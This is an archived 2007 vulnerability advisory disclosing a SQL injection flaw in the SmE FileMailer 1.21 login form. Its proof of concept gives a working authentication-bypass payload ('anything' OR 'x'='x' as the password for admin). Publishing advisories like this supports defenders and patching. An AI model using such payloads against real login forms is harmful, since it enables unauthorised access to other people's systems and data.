[x0n3-h4ck] SmE FileMailer 1.21 Remote Sql Injextion Exploit

2007-01-17T00:00:00
ID SECURITYVULNS:DOC:15738
Type securityvulns
Reporter Securityvulns
Modified 2007-01-17T00:00:00

Description

-=[--------------------ADVISORY-------------------]=-

              SmE FileMailer 1.21

Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-

-=[+] Application: SmE FileMailer -=[+] Version: 1.21 -=[+] Vendor's URL: http://www.scriptme.com/down/13 -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: sql injection -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site. Upon submitting the information, the link for file is sent to the visitor via email. This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files!

..::[ Proof Of Concept ]::..

In the login form insert

Login: admin

Password: anything' OR 'x'='x

..::[ Disclousure Timeline ]::..

[16/01/2007] - Public disclousure